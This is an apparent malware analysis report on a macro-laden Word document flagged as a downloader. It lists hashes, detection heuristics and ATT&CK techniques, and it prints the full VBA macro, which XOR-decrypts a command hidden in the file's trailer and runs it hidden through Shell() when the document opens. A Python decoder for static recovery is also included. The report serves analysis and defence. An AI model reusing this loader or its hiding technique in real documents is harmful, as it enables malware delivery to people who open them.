Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 133235471d6a3e35…

MALICIOUS

Office (OLE)

Size: 87.5 KB
Created: 2017-08-24 09:40:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 7b713f3cae6b0597e74be219e215d09f
SHA-1: 58ff099d44a6ef1978249782d4d3d5e4696612d2
SHA-256: 133235471d6a3e351c3e4ec92d42af24a4bfdd66ea696338c265953331ac6a26
Risk score: 264

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word document in the legacy OLE (CFB) container format and contains VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call in the VBA code, and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' confirms that the compiled p-code pairs an auto-execution entry point with execution tokens, so the behaviour does not depend on the source text being recoverable. In the extracted source the entry point that actually fires is Document_Open, which calls the main routine; the Workbook_Open stub merely forwards to Document_Open and would only matter if the same module ran inside Excel. The visible source contains neither a download routine nor a plaintext command. Instead the macro reads its own file from disk (ActiveDocument.FullName), converts the bytes to a string, splits that string on a long alphanumeric marker, keeps everything after the last marker, discards the first two characters, XOR-decrypts the remainder with the repeating key "JQHzoFcKLn", and passes the result to Shell() with a hidden window style, then waits for the child process via OpenProcess/WaitForSingleObject. The command is therefore stored as an encrypted trailer appended to the document rather than in the macro itself; it is not present in the carved macros.bas and is not shown on this page. The ClamAV label (Doc.Downloader.Generic) is consistent with that command being a downloader for a second-stage payload, a common delivery technique, but the page does not contain the decrypted command.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-7474871-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7474871-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace identifier found in benign Office files as well; it is not a download location and should not be treated as an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3997 bytes
SHA-256: d109bc00d7d1269e719960ef3c71344f11004c8e205a0e1a0ee35952245b43cc
Detection
ClamAV: No threats found. This is expected: the carved source holds only the decode routine, while the command it eventually passes to Shell() lives in the parent file as an XOR-encrypted trailer, not in this artifact.
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s). In this sample the flagged blob is the long alphanumeric string passed to Split(); the macro uses it as a delimiter to locate its appended payload, so it is a marker rather than encoded data.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
    Private Declare PtrSafe Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
    Private Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
#Else
    Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
#End If

Public Sub kAqnPBIjzTPDrCBgyQ()
    Dim fzjHPHAplebeCXOHQeoeI() As Byte

    fzjHPHAplebeCXOHQeoeI = qjyIrqWDdBxQoOy(ActiveDocument.FullName)
    Dim QFexzTvfVitQPcaTAGolwfxOnF As String
    QFexzTvfVitQPcaTAGolwfxOnF = StrConv(fzjHPHAplebeCXOHQeoeI, 64)
    
    Dim UKcjLZlJEDrhGUgjTL
    UKcjLZlJEDrhGUgjTL = Split(QFexzTvfVitQPcaTAGolwfxOnF, "CGOxUKUPIdGUIoNOOQKelQUeMaGIAsEwjPaRZjoKnOQCEqYFialbrILMMKKTdmpqzkLSoVOEBZRxZrAvcbAzhDfAdnfpyvGbyAduFfrmlGzrRoMujpQcLQiWekPaQygftPYzogQXKnnAdOIPBKgjEEpIrgquqqwNzuXbqmfdyTrxCISpBayfsXAOAqihQvHtRA")
    Dim iMGWDIPwxKipkUqAuTYHRDs As String
    Dim ujhfhOEmIwAmGuxKoPua As String
    Dim blsXDG As String
    ujhfhOEmIwAmGuxKoPua = StrConv(StrConv(UKcjLZlJEDrhGUgjTL(UBound(UKcjLZlJEDrhGUgjTL)), 64), 128)
    blsXDG = Mid$(ujhfhOEmIwAmGuxKoPua, 3, Len(ujhfhOEmIwAmGuxKoPua))
    
    iMGWDIPwxKipkUqAuTYHRDs = YHTwdherPxHkRbyQOhgVx("JQHzoFcKLn", blsXDG)
    
    fEbjGsOgdcnBcTbdKnv iMGWDIPwxKipkUqAuTYHRDs, 0
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Private Sub fEbjGsOgdcnBcTbdKnv(ByVal xIkvAPOfmQuLAJyc As String, _
    ByVal fdcCtmrCbHgWtkuyFfxtFIQ As VbAppWinStyle)
    
    Dim JTnHBbsvZqFjtVdvTSz As Long
    Dim HjTFanUD As Long

    On Error GoTo zYJbZoLXdFkfKbbAMjIWAaIHoh
    JTnHBbsvZqFjtVdvTSz = Shell(xIkvAPOfmQuLAJyc, fdcCtmrCbHgWtkuyFfxtFIQ)
    On Error GoTo 0

    DoEvents

    HjTFanUD = OpenProcess(&H100000, 0, JTnHBbsvZqFjtVdvTSz)
    If HjTFanUD <> 0 Then
        WaitForSingleObject HjTFanUD, &HFFFFFFFF
        CloseHandle HjTFanUD
    End If

    Exit Sub

zYJbZoLXdFkfKbbAMjIWAaIHoh:
    MsgBox "Error starting task " & _
        vbCrLf & _
        Err.Description, vbOKOnly Or vbExclamation, _
        "Error"
End Sub
Public Function YHTwdherPxHkRbyQOhgVx(FOZkEsXOhDiVna As String, eiypfVRhkibDvDQxKlE As String) As String
    Dim exTDLt As Long
    Dim pebVN As String
    Dim nKZHFryNHObDPCkr As Integer, pXCHjw As Integer, a As Long

    For exTDLt = 1 To Len(eiypfVRhkibDvDQxKlE)
        a = exTDLt Mod Len(FOZkEsXOhDiVna)
        If a = 0 Then a = Len(FOZkEsXOhDiVna)
        
        nKZHFryNHObDPCkr = Asc(Mid$(eiypfVRhkibDvDQxKlE, exTDLt, 1))
        pXCHjw = Asc(Mid$(FOZkEsXOhDiVna, a, 1))
        pebVN = pebVN + Chr(nKZHFryNHObDPCkr Xor pXCHjw)
    Next exTDLt
    
   YHTwdherPxHkRbyQOhgVx = pebVN
End Function

Public Sub Document_Open()
    kAqnPBIjzTPDrCBgyQ
End Sub

Public Function qjyIrqWDdBxQoOy(ByVal WCOYvnhnptMqUeTEtk As String) As Byte()
    Dim ujhfhOEmIwAmGuxKoPua As Long
    Dim blsXDG() As Byte
    ujhfhOEmIwAmGuxKoPua = FreeFile
        Open WCOYvnhnptMqUeTEtk For Binary Access Read As ujhfhOEmIwAmGuxKoPua
        ReDim blsXDG(LOF(ujhfhOEmIwAmGuxKoPua) - 1&) As Byte
        Get ujhfhOEmIwAmGuxKoPua, , blsXDG
        Close ujhfhOEmIwAmGuxKoPua
    qjyIrqWDdBxQoOy = blsXDG
End Function
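To recover the Shell() command without running the macro, an analyst can re-implement the decode chain above in Python and run it over a copy of the original .doc. The block below is an added example written for this report; it is not code from the sample or from any analysis tool. The marker string and XOR key are copied from the macro source above. Everything else is an assumption made for the example: the filler bytes, the two throwaway bytes and the echo command used by the self-test are constructed stand-ins, because the real encrypted trailer is not shown on this page.

```python
"""Static recovery of the Shell() command hidden in this sample's file trailer.

Added example for this report, not code from the sample or from any tool. It
re-implements the macro's own decode chain: read the file, take everything after
the LAST occurrence of the split marker, drop two characters (Mid$(s, 3, ...)),
XOR with the repeating key "JQHzoFcKLn", and that result is what Shell() receives.
"""
from __future__ import annotations

# Both constants are copied verbatim from the extracted macro source.
MARKER = (b"CGOxUKUPIdGUIoNOOQKelQUeMaGIAsEwjPaRZjoKnOQCEqYFialbrILMMKKTdmpqzkLSoV"
          b"OEBZRxZrAvcbAzhDfAdnfpyvGbyAduFfrmlGzrRoMujpQcLQiWekPaQygftPYzogQXKnnA"
          b"dOIPBKgjEEpIrgquqqwNzuXbqmfdyTrxCISpBayfsXAOAqihQvHtRA")
XOR_KEY = b"JQHzoFcKLn"


def xor_cycle(data: bytes, key: bytes) -> bytes:
    """Cyclic XOR, matching the macro's YHTwdherPxHkRbyQOhgVx routine.

    The VBA computes the key index as (i Mod Len(key)) with a result of 0 mapped
    to Len(key); for 1-based i that is exactly key[(i - 1) % len(key)], i.e. a
    plain repeating key starting at key[0].
    """
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_command(doc: bytes, marker: bytes = MARKER, key: bytes = XOR_KEY) -> bytes | None:
    """Return the plaintext the macro would pass to Shell(), or None if no marker."""
    # Split(...) followed by UBound() selects the segment after the LAST marker,
    # so an occurrence of the marker inside the stored VBA itself is irrelevant.
    idx = doc.rfind(marker)
    if idx < 0:
        return None
    tail = doc[idx + len(marker):]
    # StrConv(StrConv(x, vbUnicode), vbFromUnicode) is an identity round-trip for
    # 7-bit data, and the ciphertext is always 7-bit when command and key are
    # ASCII, so that step is omitted. Mid$(s, 3, Len(s)) drops two characters.
    return xor_cycle(tail[2:], key)


def recover_from_file(path: str) -> bytes | None:
    """Convenience wrapper for a sample on disk (point it at the parent .doc)."""
    with open(path, "rb") as fh:
        return recover_command(fh.read())


def build_constructed_sample(command: bytes) -> bytes:
    """Constructed stand-in for the .doc, built here for the example only.

    Layout assumed from the macro logic: some file content, the marker, two
    throwaway bytes, then the XOR-encrypted command as a trailing overlay. The
    OLE magic and filler are arbitrary; the real sample's trailer is not on the page.
    """
    filler = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56 + b"filler " * 8
    return filler + MARKER + b"\x01\x02" + xor_cycle(command, XOR_KEY)


if __name__ == "__main__":
    sample = build_constructed_sample(b"cmd /c echo constructed-example-command")
    print(recover_command(sample))
```

Run recover_from_file() against the original document (the ClamAV-flagged parent, not the carved macros.bas, which does not contain the trailer). A return value of None means the marker is absent, which typically happens when the file was re-saved by Word or another tool and the appended overlay was dropped; in that case the macro itself would also fail at the Split() step and the Shell() call would never receive a command.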